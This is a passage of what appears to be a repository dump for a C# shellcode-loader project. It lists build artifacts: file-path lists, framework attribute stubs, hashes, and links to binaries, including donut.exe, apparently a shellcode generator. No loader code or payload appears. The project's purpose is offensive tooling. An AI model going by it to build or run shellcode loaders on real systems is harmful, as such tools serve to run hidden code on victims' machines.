7 | F:\Personal\ShellCodeLoader\Test\obj\Debug\Test.Form1.resources
8 | F:\Personal\ShellCodeLoader\Test\obj\Debug\Test.Properties.Resources.resources
9 | F:\Personal\ShellCodeLoader\Test\obj\Debug\Test.csproj.GenerateResource.cache
10 | F:\Personal\ShellCodeLoader\Test\obj\Debug\Test.csproj.CoreCompileInputs.cache
11 | F:\Personal\ShellCodeLoader\Test\obj\Debug\Test.csproj.CopyComplete
12 | F:\Personal\ShellCodeLoader\Test\obj\Debug\Test.exe
13 | F:\Personal\ShellCodeLoader\Test\obj\Debug\Test.pdb
14 |
--------------------------------------------------------------------------------
/Test/obj/Debug/Test.csproj.GenerateResource.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/Test/obj/Debug/Test.csproj.GenerateResource.cache
--------------------------------------------------------------------------------
/Test/obj/Debug/Test.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/Test/obj/Debug/Test.exe
--------------------------------------------------------------------------------
/Test/obj/Debug/Test.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/Test/obj/Debug/Test.pdb
--------------------------------------------------------------------------------
/Test/obj/Debug/build.force:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/Test/obj/Debug/build.force
--------------------------------------------------------------------------------
/Test/obj/Release/.NETFramework,Version=v4.5.AssemblyAttributes.cs:
--------------------------------------------------------------------------------
1 | //
2 | using System;
3 | using System.Reflection;
4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.5", FrameworkDisplayName = ".NET Framework 4.5")]
5 |
--------------------------------------------------------------------------------
/Test/obj/Release/DesignTimeResolveAssemblyReferences.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/Test/obj/Release/DesignTimeResolveAssemblyReferences.cache
--------------------------------------------------------------------------------
/Test/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/Test/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache
--------------------------------------------------------------------------------
/Test/obj/Release/Test.Form1.resources:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/Test/obj/Release/Test.Form1.resources
--------------------------------------------------------------------------------
/Test/obj/Release/Test.Properties.Resources.resources:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/Test/obj/Release/Test.Properties.Resources.resources
--------------------------------------------------------------------------------
/Test/obj/Release/Test.csproj.AssemblyReference.cache:
--------------------------------------------------------------------------------
1 | ������
--------------------------------------------------------------------------------
/Test/obj/Release/Test.csproj.CopyComplete:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/Test/obj/Release/Test.csproj.CopyComplete
--------------------------------------------------------------------------------
/Test/obj/Release/Test.csproj.CoreCompileInputs.cache:
--------------------------------------------------------------------------------
1 | 314b30ac3621fd0f4a6d3cd29191e63c1c7df5a0
2 |
--------------------------------------------------------------------------------
/Test/obj/Release/Test.csproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
1 | F:\Personal\ShellCodeLoader\Test\bin\Release\Test.exe.config
2 | F:\Personal\ShellCodeLoader\Test\bin\Release\Test.exe
3 | F:\Personal\ShellCodeLoader\Test\bin\Release\Test.pdb
4 | F:\Personal\ShellCodeLoader\Test\bin\Release\ShellCodeLoader.dll
5 | F:\Personal\ShellCodeLoader\Test\obj\Release\Test.csproj.AssemblyReference.cache
6 | F:\Personal\ShellCodeLoader\Test\obj\Release\Test.Form1.resources
7 | F:\Personal\ShellCodeLoader\Test\obj\Release\Test.Properties.Resources.resources
8 | F:\Personal\ShellCodeLoader\Test\obj\Release\Test.csproj.GenerateResource.cache
9 | F:\Personal\ShellCodeLoader\Test\obj\Release\Test.csproj.CoreCompileInputs.cache
10 | F:\Personal\ShellCodeLoader\Test\obj\Release\Test.exe
11 | F:\Personal\ShellCodeLoader\Test\obj\Release\Test.pdb
12 | F:\Personal\ShellCodeLoader\Test\obj\Release\Test.csproj.CopyComplete
13 |
--------------------------------------------------------------------------------
/Test/obj/Release/Test.csproj.GenerateResource.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/Test/obj/Release/Test.csproj.GenerateResource.cache
--------------------------------------------------------------------------------
/Test/obj/Release/Test.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/Test/obj/Release/Test.exe
--------------------------------------------------------------------------------
/Test/obj/Release/Test.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/Test/obj/Release/Test.pdb
--------------------------------------------------------------------------------
/Test/obj/x64/Debug/.NETFramework,Version=v4.5.AssemblyAttributes.cs:
--------------------------------------------------------------------------------
1 | //
2 | using System;
3 | using System.Reflection;
4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.5", FrameworkDisplayName = ".NET Framework 4.5")]
5 |
--------------------------------------------------------------------------------
/Test/obj/x64/Debug/DesignTimeResolveAssemblyReferencesInput.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/Test/obj/x64/Debug/DesignTimeResolveAssemblyReferencesInput.cache
--------------------------------------------------------------------------------
/Test/obj/x64/Debug/Test.Form1.resources:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/Test/obj/x64/Debug/Test.Form1.resources
--------------------------------------------------------------------------------
/Test/obj/x64/Debug/Test.Properties.Resources.resources:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/Test/obj/x64/Debug/Test.Properties.Resources.resources
--------------------------------------------------------------------------------
/Test/obj/x64/Debug/Test.csproj.AssemblyReference.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/Test/obj/x64/Debug/Test.csproj.AssemblyReference.cache
--------------------------------------------------------------------------------
/Test/obj/x64/Debug/Test.csproj.CopyComplete:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/Test/obj/x64/Debug/Test.csproj.CopyComplete
--------------------------------------------------------------------------------
/Test/obj/x64/Debug/Test.csproj.CoreCompileInputs.cache:
--------------------------------------------------------------------------------
1 | e611841c91334bbfdd54b06c6f65ffef0d5bc2a6
2 |
--------------------------------------------------------------------------------
/Test/obj/x64/Debug/Test.csproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
1 | F:\Personal\ShellCodeLoader\Test\bin\x64\Debug\Test.exe.config
2 | F:\Personal\ShellCodeLoader\Test\bin\x64\Debug\Test.exe
3 | F:\Personal\ShellCodeLoader\Test\bin\x64\Debug\Test.pdb
4 | F:\Personal\ShellCodeLoader\Test\bin\x64\Debug\ShellCodeLoader.dll
5 | F:\Personal\ShellCodeLoader\Test\bin\x64\Debug\ShellCodeLoader.pdb
6 | F:\Personal\ShellCodeLoader\Test\obj\x64\Debug\Test.csproj.AssemblyReference.cache
7 | F:\Personal\ShellCodeLoader\Test\obj\x64\Debug\Test.Form1.resources
8 | F:\Personal\ShellCodeLoader\Test\obj\x64\Debug\Test.Properties.Resources.resources
9 | F:\Personal\ShellCodeLoader\Test\obj\x64\Debug\Test.csproj.GenerateResource.cache
10 | F:\Personal\ShellCodeLoader\Test\obj\x64\Debug\Test.csproj.CoreCompileInputs.cache
11 | F:\Personal\ShellCodeLoader\Test\obj\x64\Debug\Test.csproj.CopyComplete
12 | F:\Personal\ShellCodeLoader\Test\obj\x64\Debug\Test.exe
13 | F:\Personal\ShellCodeLoader\Test\obj\x64\Debug\Test.pdb
14 |
--------------------------------------------------------------------------------
/Test/obj/x64/Debug/Test.csproj.GenerateResource.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/Test/obj/x64/Debug/Test.csproj.GenerateResource.cache
--------------------------------------------------------------------------------
/Test/obj/x64/Debug/Test.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/Test/obj/x64/Debug/Test.exe
--------------------------------------------------------------------------------
/Test/obj/x64/Debug/Test.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/Test/obj/x64/Debug/Test.pdb
--------------------------------------------------------------------------------
/Test/obj/x64/Release/.NETFramework,Version=v4.5.AssemblyAttributes.cs:
--------------------------------------------------------------------------------
1 | //
2 | using System;
3 | using System.Reflection;
4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.5", FrameworkDisplayName = ".NET Framework 4.5")]
5 |
--------------------------------------------------------------------------------
/Test/obj/x64/Release/DesignTimeResolveAssemblyReferences.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/Test/obj/x64/Release/DesignTimeResolveAssemblyReferences.cache
--------------------------------------------------------------------------------
/Test/obj/x64/Release/DesignTimeResolveAssemblyReferencesInput.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/Test/obj/x64/Release/DesignTimeResolveAssemblyReferencesInput.cache
--------------------------------------------------------------------------------
/Test/obj/x64/Release/Test.Form1.resources:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/Test/obj/x64/Release/Test.Form1.resources
--------------------------------------------------------------------------------
/Test/obj/x64/Release/Test.Properties.Resources.resources:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/Test/obj/x64/Release/Test.Properties.Resources.resources
--------------------------------------------------------------------------------
/Test/obj/x64/Release/Test.csproj.AssemblyReference.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/Test/obj/x64/Release/Test.csproj.AssemblyReference.cache
--------------------------------------------------------------------------------
/Test/obj/x64/Release/Test.csproj.CopyComplete:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/Test/obj/x64/Release/Test.csproj.CopyComplete
--------------------------------------------------------------------------------
/Test/obj/x64/Release/Test.csproj.CoreCompileInputs.cache:
--------------------------------------------------------------------------------
1 | 334974ef2a92acfcd84605ca1f9b38fc7607a857
2 |
--------------------------------------------------------------------------------
/Test/obj/x64/Release/Test.csproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
1 | F:\Personal\ShellCodeLoader\Test\bin\x64\Release\Test.exe.config
2 | F:\Personal\ShellCodeLoader\Test\bin\x64\Release\Test.exe
3 | F:\Personal\ShellCodeLoader\Test\bin\x64\Release\Test.pdb
4 | F:\Personal\ShellCodeLoader\Test\bin\x64\Release\ShellCodeLoader.dll
5 | F:\Personal\ShellCodeLoader\Test\obj\x64\Release\Test.csproj.AssemblyReference.cache
6 | F:\Personal\ShellCodeLoader\Test\obj\x64\Release\Test.Form1.resources
7 | F:\Personal\ShellCodeLoader\Test\obj\x64\Release\Test.Properties.Resources.resources
8 | F:\Personal\ShellCodeLoader\Test\obj\x64\Release\Test.csproj.GenerateResource.cache
9 | F:\Personal\ShellCodeLoader\Test\obj\x64\Release\Test.csproj.CoreCompileInputs.cache
10 | F:\Personal\ShellCodeLoader\Test\obj\x64\Release\Test.exe
11 | F:\Personal\ShellCodeLoader\Test\obj\x64\Release\Test.pdb
12 | F:\Personal\ShellCodeLoader\Test\obj\x64\Release\Test.csproj.CopyComplete
13 |
--------------------------------------------------------------------------------
/Test/obj/x64/Release/Test.csproj.GenerateResource.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/Test/obj/x64/Release/Test.csproj.GenerateResource.cache
--------------------------------------------------------------------------------
/Test/obj/x64/Release/Test.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/Test/obj/x64/Release/Test.exe
--------------------------------------------------------------------------------
/Test/obj/x64/Release/Test.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/Test/obj/x64/Release/Test.pdb
--------------------------------------------------------------------------------
/donut.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/donut.exe
--------------------------------------------------------------------------------